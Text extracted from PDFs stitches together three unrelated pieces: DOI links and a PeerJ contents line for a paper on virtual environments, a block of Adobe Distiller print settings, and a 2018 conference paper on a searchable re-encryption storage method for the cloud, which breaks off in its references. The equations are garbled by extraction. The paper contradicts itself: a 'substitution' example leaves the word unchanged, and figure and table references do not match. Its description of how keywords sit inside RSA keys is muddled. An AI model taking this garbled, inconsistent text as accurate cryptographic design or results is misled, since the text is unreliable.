http://dx.doi.org/10.3758/s13423-017-1323-7 http://dx.doi.org/10.2190/V0LB-1M37-RNR8-Y2U1 http://dx.doi.org/10.1162/105474698565686 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.315 Immersive virtual environments and embodied agents for e-learning applications Introduction Materials and Methods Analysis and results Discussion Conclusions References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_vekcikqpvnfl5fcyouudnppwsm ---- IET Submission Template 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 89 A Searchable Re-encryption Storage Method in Cloud Environment Wang Hui School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China e-mail: 277019826@qq.com Hong Bo, Tang Junyong School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China Abstract—Traditional cloud storage systems do not adapt well to different application environment and does not guarantee the integrity and confidentiality of cloud data. In order to solve the problems brought by the hysteretic and density in the cloud storage system,A Searchable Re-encryption Storage Method (SReCSM) is proposed in this paper. The central idea of the SReCSM is to generate a re-encryption key and decrypte while the keyword matched. Simulation results show that SReCSM introduced in this paper has better security and reliability. Keywords-Cloud Storage; Re-encryption; Decrypt; Reliability I. INTRODUCTION In order to meet the various storage demands, cloud storage is designed to store data in cloud and is widely used in the Internet. Compared with traditional data storage, it greatly improves the efficiency of the mass data storage and utilization of network resource. It is essential to reduce user download wait time for a requested file from a network to enhance client quality experience. Therefore, cloud storage faces serious security and efficient problems [1]. Traditional cloud storage systems do not adapt well to different application environment and does not guarantee the integrity and confidentiality of cloud data. Therefore, it's very dangerous for sensitive data to be stored directly in the cloud. The reliability of the mobile cloud storage depends on the extent of the impact on system storage efficiency while the storage solution fails [2]. Therefore, storing sensitive data on un-trusted server is a challenging issue [3]. Simple encryption techniques have key management issues and which can't support complex requirements such as query, parallel modification, and fine-grained authorization. To guarantee confidentiality and proper access control of sensitive data, classical encryption is used [4].To solve the problems brought by the hysteretic and density of traditional storage methods in the cloud storage system, in this paper, SReCSM, Searchable Re-encryption Storage Method is proposed. II. RELATED WORK Efforts have been taken by researchers, developers, practitioners, and educators to identify and discuss the technical challenges and recent advances related to cloud storage. Han et al. proposed [5] multi-path data prefetching in mobile cloud storage. Wang et al. [6] presented an Optimized Replica Distribution Method (ORDM) in cloud storage system. Chen et al. [7] proposed a new metric called joint response time, which not only considers the waiting time when the requested data are unavailable but also the queuing delay and service time when data become available. Tysowski et al. proposed several useful schemes in [8]. One scheme is a Manager based Re-encryption Scheme (MReS), which acomplished the security through the proxy re-encryption scheme. And the other cryptographic scheme proposed in [8] is Cloud-based Re-encryption Scheme (CReS). Although MReS and CReS make up for the limitations of the existing schemes, these two schemes are more complex and need more time to re-encrypt. [9] propose proxy re-encryption algorithm to confirm the security of the datain thecloud, which can alleviate the client's burden, and enhance the confidentiality of cloud data. However, there are two major disadvantages with these techniques. First, for re- encryotion, the data owner must obtain user's public key before uploading. Second, because the same plaintext is used with different keys gerenated by proxy, therefore, the storage overhead becomes excessive. III. SEARCHABLE RE-ENCRYPTION METHOD The central idea of the searchable re-encryption is to generate a re-encryption key and decrypte while the keyword matched. By using searchable re-encryption method, SReCSM may increase the storage requirements because all the encrypted data must be stored. The objective of the proposed searchable re-encryption method is to improve the storage requirements, bring down the security risks, minimize the scheduling time, overhead ratio and the storage cost. This technique will not provide the effective data utilization. The new method SReCSM is easier and faster to implement in the cloud while sorting the matrix by using the searcherable keyword. SReCSM would reduce the cost and the time complexity will be reduced. A. Symbol Definitions Symbols in the Searchable Re-encryption method are defined in the in Table I. mailto:a.author@email.com http://cn.bing.com/dict/search?q=Cloud&FORM=BDVSP6&mkt=zh-cn http://cn.bing.com/dict/search?q=storage&FORM=BDVSP6&mkt=zh-cn 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 90 TABLE I. SYMBOL DEFINITION Symbol Definition PR(Key) Private key of the user PU(Key) Public key of the user Key(Wd) Keyword DB Database ED(Key) Editing Keyword EN(Dat) Encrypted Data PR(Key)Re Re-encrypted Private key PU(Key)Re Re-encrypted Public key ED(Dat) Re Re-encrypted Encrypted Data DE(Dat) Decrypted Data Key(U) Keyword got through the public key Key(R) Keyword got through the private key Sen Sender Rec Receiver Ser Cloud Server B. Keyword Editing The keyword can be edited in three cases while searching. We can edit the keyword while inserting, deleting or substituting. Let us suppose that n is this notation and the keyword edited is  ED Key . Case 1 If  ~= ( )ED Key n i Inserting the character into the first place For example: Character string (old) = ‘‘BOK’’ If =3i ;  ~= (3)ED Key n In third place have to insert new character Character String (new) = ‘‘BOOK’’ Case 2 If   ( )ED Key n i Deleting the character into the first place For example: Character string (old) = ‘‘BOK’’ If =3i ;   (3)ED Key n In third place have to delete the letter Character String (new) = ‘‘BO’’ Case 3 If   ( )ED Key n i Substitute the character into the first place For example: Character string (old) = ‘‘BOK’’ If =3i ;   (3)ED Key n The third position in the keyword is replaced with a new character Character String (new) = ‘‘BOK’’ These three different cases can help us edit the keywords easily. The user handles some of the wrong situations by using the keyword. And we can edit the keyword to recover errors through these three different situations. C. Searchable Re-encryotion The core of the searchable re-encryption method is to generate a re-encryption key only when the keyword matches to the character. Re-encryption operates over two groups 1 G and 2 G of prime order q with a bilinear map e : 1 1 2 G G G  . The parameters of the cloud system are random generators 1 g G and   2,Z e g g G  . The Searchable Re-encryption can be defined in the following algorithms. Next, the algorithm 2 is described in detail. In algorithm 2, the keywords should be searched first. The file would be decrypted with this keyword only when the keyword matches. And then the data can be received, stored, and accessed in the cloud. Algorithm 2: Searching Keyword Input: Keyword for ( )PR Key Output: Keyword Matching If ( ) ( )PR Key Key Wd Goto  DB i Else If ( ) ( )ED Key n i \\ case-3 Goto  DB i Keyword Not Matching Else If ( ) ( )ED Key n i \\ case-2 Keyword Matching" End If The keywords are included in the private key and will be searched in the database. Keyword contained in the private key should be validated in the cloud storage database. In the cloud system, the data will be transmited to the servers and then be stored in the database. Data can be accessed from the database through this keyword. The mode of "Keyword Editing " can be used to insert, delete, and replace when the keyword does not match. On the contrary, the data will be received from the cloud server once the keyword matches. Algorithm 3: Sharing Data Generate ( )PU Key and ( )PR Key   ( )= ( ),PU Key EN Dat Key U   ( )=PR Key Key R Sen shares ( )PU Key to Ser Sen shares ( )PR Key to Rec Send ( )EN Dat to Ser Rec sends  Key R to Ser Ser verify  Key R If  Key U =  Key R Ser sends   ( ),DE Dat Key R to Rec End If The data may be shared between the owners and the users through the cloud server, which is introduced in detail in algorithm 3. First, the public key and the private key will be created by the data owners. Next, the public key is shared to the cloud server and the private key is shared to the data receiver. There is the keyword in each private key and public key, and the data users can retrieve data through this 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 91 keyword. Finally, the data will be transfered by the cloud server only when the keyword of the public key and the keyword of the private key is matched. Algorithm 4: Encrypting Data Define two prime numbers as s and t Assign r s t  , where r will be used for the module of the private key and the public key Assign Euler’s function as    ( 1) 1E r s t   Assign i as integer and  1 i E r  for all   , 1i E r  In which, i and  E r are co-prime Assign  1 2, , , nD f f f  ; f as file, D as data and n as the number of the files.         1 2, , , nD r f r f r f r  Encrypted data,     ( ) ( ); ( ),EN Dat D r mod E r Key Wd PU Key Algorithm 4 introdeces the scheme of data encryption, in which the data will be encrypted through the RSA algorithm. First, the two prime numbers are multiplied together, and then compute the product. Each data may be encrypted with Euler’s function of  E r . Keyword of the public key and private key are contained in encrypted data. And each data is modeled by using function of  E r . Algorithm 5: Re-encrypting Data Generate   Re PR Key ,   Re PU Key Assign  1 2, , , nD f f f  , 1g G ; f as files, D as the data and n as the number of the files.         1 2, , , nD r f r f r f r  Re-Encrypted data, Re ( ) ( ( ), ( )) M M Re ED C PU PU Key ED C Algorithm 5 introdeces the scheme of data re-encryption, in which the data will be encrypted through the AES algorithm. The re-encryption keys for authorized user's list will be generated by the user 'M'. The public key and private key of the users' can be used by 'V'. 1 Re Re ( ) ( ) ( ) ,i M x x i PU Key PR Key g v V    The CSReSM generates the * I q v Z and encrypts the data through the following steps randomly: ( ) I I v v new Z Z PU Key  ( ( ) ) ( )I I v v new EN Dat Z Z M   ( ) , ( )I I M v v x EN C Z M EN CM g   The encrypted data ' ( )EN C ' will be uploaded through CSReSM and ' ( ) M EN C ' represents the mobile user 'M'. The CSReSM transforms ' ( ) M EN C ' into ' ( ) M Re EN C ' using the re-encryption key Re ( )PU Key and ( ) M EN C as shown in the following equation: Re ( ) ( ( ), ( )) M M EN C e PU Key EN C = , ( ) i M M I x x x v e g g = ( ) i I x v e g g， Algorithm 6: Decrypting Data Consider D key =  ( ), ( )PR Key Key Wd For 1f  to N //Data files   ( ) ( )DE Dat EN Dat mod PR Key End for f loop Goto ( )DE Dat Algorithm 6 introdeces the scheme of data decryption, in which the data will be decrypted through the steps described above. First, the decryption key will be used by the user, and the decryption key contains the keyword of the private key. After selecting the number of files, the data will be decrypted through modulo function. D. Security analysis Assuming that the reliability of the cloud storage system is identified by symbol A . The time of encryption through different encryption algorithms is t A , the encryption time t A is reversed first ， and after the normalization processing ， j A is got from t A .The storage cost of the different node is normalized to be thevalue k A . The number of the storage states for the cloud storage is the value n the reliability model of the system is shown in formula (1). [1 (1 ) ][1 (1 ) ] n n j k A A A      It can be concluded from the analysis of the reliability model. When the vale t tends to be infinite, which means t  , the storage cost of the node in the cloud system also tends to a certain stable value, and the state of storage strategy tends to be stable. When the value of j A and k A are more closer to 1, and the value of n is more large, the cloud storage system will be more reliable and with higher security. IV. EXPERIMENT The proposed scheme SReCSM Searchable Re- encryption Storage Method was developed and verified through Python. The real-time ability, security and reliability of SReCSM was evaluated through a series experiments. In this part, we analyzed the prediction, the searching time, searching efficiency and storage space while performing moving, copying, encryption, re-encryption, storing and decryption. The final experimental results are comparative analyzed with the existing technologies including CReS and 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 92 MReS, and the results show that SReCSM has better security and reliability. A. Uploading and Downloading of SReCSM The data response tests are performed on file upload, file copy and file movement, for large files and small files respectively.It can be known that 94 percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. The experimental results show that the system responds fast. Table Ⅱ and Table III are the test result. TABLE II. THE PERFORMANCE OF THE MOBILE END UPLOAD THE DATA type of test utilization rate of Mobile CPU （%） transmissio n rate （Mbps） utilization rate of Mobile /transmission rate Raw data 16.436 3.57020 4.603663 After the encryption 38.432 2.36015 16.283711 The ratio of CPU occupancy to upload speed is shown in table Ⅱ, which the data on the mobile side are tested before the encryption and after the encryption respectively. TABLE III. THE PERFORMANCE OF THE MOBILE END DOWNLOAD THE DATA type of test utilization rate of Mobile CPU （%） transmissi on rate （Mbps） utilization rate of Mobile /transmission rate Raw data 14.681 3.90135 3.763056 After the encryption 35.221 2.76147 12.754439 The ratio of CPU occupancy to download speed is shown in table III, which the data on the mobile side are tested before the decryption and after the decryption respectively. It can be known from the table Ⅱ and the table III, if the encryption and decryption mechanism are used for transmission, then the CPU utilization will be increased by an average of 22% ~ 25% and the overall file transfer rate will be reduced by 30% ~ 35%. As we can see，when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. B. Encryption and Re-Encryption SReCSM The keyword can be set and searched in proposed method SReCSM. Only if the value of the keyword just matches, data can be received. Suppose that the number of the users in proposed method SReCSM is 600 users, and the available number of the searching keywords range from 600 to 6000. The cloud server store the keywords and all encrypted data through the database. There are two questions to be considered: One is the impact of encryption and decryption on file speed.The other is the impact of encryption and decryption on the performance of the client host. The experimental data are listed in Table IV, which includes the time spent on encrypting the different sizes or different type files by using SReCSM and the time spent on transmitting the file. TABLE IV. TIME COMPARISON ON ENCRYPTION AND DECRYPTION BY USING SRECSM File size （M） File type SReCSM encryption （ms） HDS upload （ms） SReCSMdecr yption （ms） HDS download （ms） 3.07 pdf 1050 2685 370 2800 3.22 MP3 1178 2600 478 2830 23.8 mkv 3238 5930 2648 6290 25.8 doc 3140 5260 2163 6400 166.518 rmvb 23830 46400 16500 42460 It can be concluded from the above test data, the time spent on encryption or decryption by using SReCSM is regardless of the file type. The same size files are encrypted by different CReS, MReS, or SReCSM algorithms and then the re-encryption time is different, as shown in table V and Figure 1. The 167.58 MB file in table V is the test case. Figure 1. Comparison of Re-encryption time In the SReCSM proposed in this paper，the time of encryption or decryption is relatively short. It may take a relatively long time to encrypt files by using the CReS, which cause a significant additional time overhead for HDFS. However, the encryption time that MReS encrypting the file was not significantly increased compared to SReCSM. Besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. TABLE V. TIME COMPARISON FOR DIFFERENT ALGORITHM ENCRYPTION File size （M） MReS Re-encrypt （ms） CReSRe- encrypt （ms） SReCSMRe -encrypt （ms） 3.04 1048 770 720 23.15 3230 2901 2600 80.35 12010 10230 8560 167.58 23820 23612 23598 The comparison of the storage space required in different schemes is shown in Figure 5a. As the number of keywords increase, the storage space required by the cloud system also becomes larger. More storage space have been required by the existing schemes such as CReS and MReS. However, we 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 93 can see in figure 2a that SReCSM utilize the data transfer effectively and moreover reduce the storage space requirements in the system. Figure 2. Comparison while increasing the number of keywords It can be observed from the trends presented in Figure 2b that the searching time varies according to the number of keywords. The available number of the searching keywords range from 600 to 6000. As the number of keywords increases, searching time required by the system also increase. More searching time have been need by CReS and MReS. And we can see in Figure 2b that lesser time was need to search using SReCSM. If the searching keyword does not match, SReCSM will immediately use the edit function. MReS, CReS, and SReCSM offload the re-encryption operations in cloud system. And then in the following experiment, we examined the energy consumption and turnaround time while the re-encryption operation were performed. The experimental results are shown in Fig. 3. Figure 3. Comparison while re-encryption and decryption We can see from Figure 3a and 3b, while re-encryption operations were performed in mobile terminal, the turnaround time and energy consumption will increase according to the file size increases.In the same way, Figure 3c and 3d show that, while decryption operations were performed in mobile terminal, the turnaround time and energy consumption will increase according to the file size increases. Using the reliability model formula (1) of the cloud storage system proposed in 3.4, combine the time required for processing the same size of file in table III, when a different algorithm CReS，MReS and SReCSM is used, the encryption time required for encrypting file, after that the encryption time is reversed, j A then be got after the encryption time is normalized.In the same way, after normalizing, storage cost k A is got. If both j A and k A are closer to 1, and the number of storage state in the cloud storage system is larger, then the reliability of the system is higher. According to the above analysis，the data in one hour is sampled continuously, combined with the data in table III and table IV, the reliability contrast diagram for SReCSM is shown in figure 4. Figure 4. The reliability contrast diagram It can be know the reliability of the system through different algorithm by comparing the data in figure 4.The reliability of the system is relatively high. That is， it has little impact on file transfer and user experience by using CreS re-encryption. It may take a relatively long time to re- encrypt files by using the MReS.However, the re-encryption time that MReS combined with CReS for re-encrypting the file was not significantly increased compared withCReS. The value of the reliability is consistent with the use of CReS, which can be maintained around one. It is concluded that the system is relatively reliable by using SReCSM encryption. Through these simulation experiments, it is verified that SReCSM has a good user experience. It is also verified that the mechanism of SReCSM can effectively improve the efficiency of the cloud storage.When a mobile terminal makes a request, the optimal node is selected and then the time can be saved effectively. In the SReCSM presented in this paper, the re-encryption and decryption has the following characteristics:transport security and storage security of the user data are guaranteed. V. CONCLUSIONS AND FUTURE WORK The existing schemes such ascloud-based re-encryption scheme CReS and manager-based re-encryption scheme MReS re-encrypts the keyword to transmit safety. But these two schemes are more complex and need more time to re- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 94 encrypt. In order to reduce the computational complexity, enhance the secure transmission,a new scheme SReCSM is proposed.SReCSM has high reliability proved through a series of simulation experiments. Turn around time and energy consumption of different size of files are compared and analyzed through these experiments. When the file size increases, proposed SReCSM can achieve accurate predictions, reduce the storage space requirement and the re- encrypting time. Finally, it is concluded that the SReCSM proposed in this paper has better security and reliability. ACKNOWLEDGMENT Foundation item: The Industrial research project of Science and Technology Department of Shaanxi Province(Grant No. 2016KTZDGY4-09); Laboratory fund of Xi'an Technological University (GSYSJ2017007); Research project on teaching reform of education in Shaanxi province (Grant No. 17JY015); Characteristic disciplines in Education department of Shaanxi province (Grant No. 080901); Research project on teaching reform of Xi 'an Technological University (Grant No. 17JGZ10); The principal fund of Xi'an Technological University (Grant No. XGYXJJ－0528). REFERENCES [1] Jung, Kye-Dong, Moon, Seok-Jae, Kim, Jin-Mook: 'Data access control method for multimedia content data sharing and security based onXMDR-DAI in mobile cloud storage'.Multimedia Tools and Applications, v 76, n 19, October 1, 2017, pp 19983-19999 [2] Chekam, T.T., Zhai, E., Li, Z., Cui, Y., Ren, K.: 'On the synchronization bottleneck of OpenStack Swift-like cloud storage systems'. In: IEEE INFOCOM 2016 - 